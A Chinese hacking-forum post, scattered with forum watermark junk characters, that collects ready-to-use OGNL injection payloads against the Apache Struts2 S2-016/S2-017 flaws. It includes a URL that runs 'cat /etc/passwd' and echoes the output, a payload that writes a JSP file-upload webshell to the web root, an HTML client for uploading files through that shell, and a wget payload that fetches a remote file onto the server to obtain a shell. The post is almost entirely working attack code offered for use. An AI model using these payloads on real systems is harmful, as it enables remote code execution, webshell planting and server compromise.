Struts2 S2-016/S2-017漏洞执行代码

admin

大家都发了，，我就整理了一下。友情提示，自己小命比shell重要哦。。

% L7 S! b) B; c4 }6 U喜欢就点一下感谢吧^_^
( j. a. \4 x1 G% v4 E
带回显命令执行：
# }$ c3 N: \& G3 i9 [. W; G
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
$ d3 X9 |' z1 K8 l+ e0 k
9 t& z. l3 j8 W* `4 r




6 c+ t: z  A- f0 T! v3 T
6 t: t" \5 m" Y- k! L爆路径：
1 N4 `5 g" d# ^9 E! Q
# H0 b" v) W$ E& e% l  vhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D



' A! ^0 w/ V$ I5 C* n

. T5 B0 r1 R! |! f) ^/ p, j6 d写文件：
7 m2 Z' y( y; R% M
' ^. {7 p& o% U  z2 d6 k- chttp://www.example.com/struts2-blank/example/X.action?redirect:${

%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
  k7 _7 G, v3 Y+ I$ N( x; ]9 ]
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
$ O% j  j+ \, r8 ~- \5 \4 G
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e



+ }' e* W% |) R# o( ?写入的文件内容：

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
( m4 M8 P' o. z2 W/ a0 n9 r: z* k
其实就是一个jsp的小马，需要客户端配合                                                                                 

, k4 F7 Z  t1 J; N1 f# q函数f是文件名，t是内容
7 c+ Z8 o4 X5 \9 `
客户端：
( G- q" u7 N) m* i' N
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">

<textarea name=t cols=120 rows=10 width=45>your code</textarea>
6 I, k" t  D# b1 w' R
<center>
4 ^0 Z3 I6 V7 c7 h* L0 x
- o! C0 e7 \2 [+ e  Y" N
0 x* {/ u2 b7 W. j
2 i) X7 t* \/ Q' C, j) C/ @) B<input type=submit value="提交">

</form>
  A# U3 \# c9 k1 I5 m, V
" x. Q7 V- j9 R就在当前目录建立一个fjp.jsp

# c0 w0 Z$ y$ t! J* p+ w: t! Yshell：http://www.example.com/struts2-blank/example/fjp.jsp
: O0 d* l' _  C1 V
6 I9 O' c" P6 p

: u$ a1 I% N) Y还有@园长的一个客户端：
" }8 Q& y# I& T- i* E$ x( s* @* E
<html>

1 [1 k6 J* A* S<head>
! t/ T6 P+ Y/ K! G
+ D$ w' e& k9 n% |2 ]/ K+ G<meta http-equiv="content-type" content="text/html;charset=utf-8">
1 a6 c% I% v9 p& _9 ^% ]
( ]' E6 h' i, t; J' U& O$ e<title>jsp-园长</title>

</head>
6 x7 |( z  j2 N9 C1 ?
" A; }- l7 S% l* s7 [<style>
% m. Z5 P8 N  Z7 N" Q. C# P
4 d( ~; s. o- I* N% x/ z  z" X.main{width:980px;height:600px;margin:0 auto;}
# d/ k5 Z* R% f: j0 N( p. {  b6 {3 `
.url{width:300px;}

.fn{width:60px;}

" P6 i6 e1 a. o/ k6 d.content{width:80%;height:60%;}

</style>
+ m$ T: V# I- q0 m9 ]5 P& a4 z
9 ~7 g& W4 c2 ^& H' C- U<script>

' S. X0 f1 m3 I! x: U+ j: N  function upload(){
  T+ a8 Y9 e! Y3 W; w8 ?7 Z
    var url = document.getElementById('url').value,

* [, }( o- ~1 f$ M/ @      content = document.getElementById('content').value,

( A: b" z% N" \% _      fileName = document.getElementById('fn').value,

2 {) p) E1 S/ E' M, C! t$ v      form = document.getElementById('fm');
  T, C$ r& D5 D: x1 ^
    if(url.length == 0){

      alert("Url not allowd empty!");

      return ;

1 g  a% R1 y8 j0 [0 `( ^    }

    if(content.length == 0){
/ M( L6 v- Q, A! R/ B# b6 M+ j7 z& x
! t  T5 z& R) P8 ?4 F( p) Y      alert("Content not allowd empty!");

      return ;
, y6 |2 ]) ?7 f! z) D  w0 W
    }

- E% ^* v) f2 t0 k7 `( v% y    if(fileName.length == 0){

      alert("FileName not allowd empty!");

      return ;
, Y' g' @1 x% l. C, m7 E
$ w7 h6 Z% ~# ?: R1 S; Z6 j3 S    }

" T. q4 M: {: W: t8 C4 d, U3 S    form.action = url;

! q2 y2 K1 o, M# s# T4 }# ^    form.submit();

  }

</script>
1 I0 y  m/ O% K# E& N
8 r* R$ Z- i. e# y<body>
9 S4 [9 f4 O3 T/ r) r- x% r6 o
<div class="main">

/ }" A7 H" g% D  <form id="fm" method="post">  
4 V1 H: L* ?6 H
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
: a# j2 G! O3 p; r/ a& ?
3 Y/ ~( m& |) @4 L    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
# L) u. ?7 F9 S& e( q0 e" X
6 R' U* i  ]' J& \    <a href="javascript:upload();">Upload</a>

) U$ P+ X5 M2 u! a

    <textarea id="content" class="content" name="t" ></textarea>

  K6 s7 g: L& Q2 e4 r6 r$ h" A  </form>
1 t1 d& C3 l- c9 J: F/ m
6 |. B* {$ m) Q& ^2 q, d# N  {* a</div>
3 B, ^. X6 M9 v, _* Y4 i
' k: B0 H/ o$ g: Y4 p" G</body>
" j+ V& v$ W0 z; f+ R
6 A& C4 t7 v, V/ E' U" |0 I  I8 a</html>



还有@X发的一个wget的getshell

0 Q& |( q5 L! |5 v! u% o* ??redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
) @$ O7 i' b2 V# B4 w
2 f8 t, D7 @3 t)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
- F+ s+ Q$ e5 i% G0 h& H2 c& h7 {复制代码